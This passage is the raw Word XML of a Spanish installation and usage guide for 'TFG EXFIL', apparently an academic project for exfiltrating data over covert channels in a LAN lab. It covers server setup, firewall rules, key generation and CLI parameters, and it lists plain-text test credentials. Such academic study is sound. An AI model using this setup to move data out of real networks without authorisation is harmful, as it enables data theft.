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8"/>
        </w:rPr>
        <w:t>TFG EXFIL — Guía de Instalación y Uso</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sistema modular de exfiltración de datos mediante canales encubiertos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1. Requisitos previos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Todas las instalaciones deben realizarse en la máquina servidora (192.168.1.34), salvo las dependencias Python y Npcap que también son necesarias en la máquina emisora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>1.1 Python 3.13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Descargar Python 3.13 desde https://www.python.org/downloads/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Durante la instalación marcar «Add Python to PATH».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Verificar:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python --version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>1.2 Dependencias Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Instalar en ambas máquinas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pip install scapy paramiko cryptography dnspython python-docx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>scapy — captura y construcción de paquetes raw (TCP, ICMP). Requiere Npcap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>paramiko — cliente/servidor SSH/SFTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>cryptography — cifrado AES-GCM y RSA-OAEP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>dnspython — resolución DNS en el cliente DNS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>1.3 Npcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Descargar la última versión desde https://npcap.com/#download</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Durante la instalación activar «Install Npcap in WinPcap API-compatible Mode».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Requerido en ambas máquinas para TCP (métodos 1 y 2) e ICMP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="707070"/>
        </w:rPr>
        <w:t>NOTA: Los métodos TCP/1, TCP/2 y todos los ICMP requieren ejecutar el CLI con privilegios de Administrador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>1.4 OpenSSH Server (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>En la máquina servidora, abrir PowerShell como Administrador:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Start-Service sshd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Set-Service -Name sshd -StartupType Automatic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Puerto: 22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Usuario de prueba: Usuario / Orion_2003</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Directorio de exfiltración (crear manualmente): C:\tfg_test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>1.5 FileZilla Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Descargar FileZilla Server (última versión disponible) desde https://filezilla-project.org/download.php?type=server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Instalar con los valores por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Abrir la interfaz de administración (por defecto localhost:14148).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Crear usuario FTP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Usuario: ftproot    Contraseña: ftproot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Asignar directorio raíz al usuario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Puerto de escucha: 21.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Modo de autenticación: contraseña normal (no «Use system credentials»).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="707070"/>
        </w:rPr>
        <w:t>NOTA: Si el login falla, verificar que el usuario está habilitado, la contraseña está guardada y el modo de autenticación no es «Use system credentials».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>1.6 hMailServer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Descargar hMailServer desde https://www.hmailserver.com/download</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Durante la instalación seleccionar «Use built-in database».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Abrir hMailServer Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Crear dominio: lan.local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Crear cuenta: user@lan.local  /  Contraseña: password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>SMTP — puerto 587, STARTTLS deshabilitado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>IMAP — puerto 143, SSL deshabilitado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Habilitar relay para la red local si fuera necesario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2. Reglas de Firewall (servidor 192.168.1.34)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ejecutar en PowerShell como Administrador en la máquina servidora:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="TFG HTTP TFG" protocol=TCP dir=in action=allow localport=8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="TFG FTP" protocol=TCP dir=in action=allow localport=21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="TFG SSH" protocol=TCP dir=in action=allow localport=22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="TFG DNS" protocol=UDP dir=in action=allow localport=53</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="TFG IMAP" protocol=TCP dir=in action=allow localport=143</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="TFG SMTP" protocol=TCP dir=in action=allow localport=587</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="TFG TCP Exfil" protocol=TCP dir=in action=allow localport=9000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Regla especial para ICMP (todos los métodos):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="TFG ICMP" protocol=icmpv4:8,any dir=in action=allow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>3. Generación de claves criptográficas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ejecutar desde C:\TFG-REPO. Crea automáticamente las carpetas claves/simetrico y claves/asimetrico con los ficheros necesarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python -c "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import os, secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>from cryptography.hazmat.primitives.asymmetric import rsa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>from cryptography.hazmat.primitives import serialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>os.makedirs('claves/simetrico', exist_ok=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>os.makedirs('claves/asimetrico', exist_ok=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>with open('claves/simetrico/clave.key', 'wb') as f: f.write(secrets.token_bytes(32))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>with open('claves/asimetrico/privada.pem', 'wb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(priv.private_bytes(serialization.Encoding.PEM,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        serialization.PrivateFormat.TraditionalOpenSSL, serialization.NoEncryption()))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>with open('claves/asimetrico/publica.pem', 'wb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(priv.public_key().public_bytes(serialization.Encoding.PEM,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        serialization.PublicFormat.SubjectPublicKeyInfo))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>3.1 Clave simétrica (AES-GCM 256 bits)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Se genera un fichero binario de 32 bytes aleatorios. Actúa como clave compartida: ambas máquinas deben tener exactamente el mismo fichero en la misma ruta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Fichero: claves/simetrico/clave.key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Copiar a la máquina receptora antes de la prueba.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>El nonce (8 bytes) se genera en cada transferencia y viaja incrustado al inicio del stream cifrado. No se necesita ningún fichero adicional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>3.2 Par de claves asimétricas (RSA 2048 bits)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Clave privada: claves/asimetrico/privada.pem — debe permanecer en la máquina receptora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Clave pública: claves/asimetrico/publica.pem — se copia a la máquina emisora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>La clave de sesión AES (32 bytes) se genera aleatoriamente por transferencia, se cifra con RSA-OAEP y se incrusta en el inicio del stream junto con el nonce. No se necesita ningún fichero adicional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>4. Uso general del CLI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>El punto de entrada es tfg_cli.py. Todos los comandos se ejecutan desde C:\TFG-REPO. Existen dos subcomandos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>send — Emisor: lee el recurso, lo cifra (opcional) y lo exfiltra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>receive — Receptor: escucha el canal, recibe los datos y los descifra (opcional).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Parámetros comunes a send y receive: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--transfer-id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Identificador único de la transferencia. Debe coincidir en emisor y receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--canal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Canal de exfiltración: HTTP, TCP, ICMP, DNS, SSH, FTP, SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--metodo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Número de método dentro del canal (1, 2 o 3 según el canal).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--cifrado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Esquema de cifrado: NINGUNO, SIMETRICO, ASIMETRICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--algoritmo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Algoritmo de cifrado. Obligatorio si cifrado != NINGUNO. Valores: AESGCM, RSA_OAEP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--clave-privada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ruta a clave.key (simétrico) o privada.pem (asimétrico, solo receptor).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--clave-publica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ruta a publica.pem. Solo en el emisor con ASIMETRICO.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>IP destino (send) o interfaz de escucha (receive, usar 0.0.0.0 para todas).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto. Varía según el canal.</w:t>
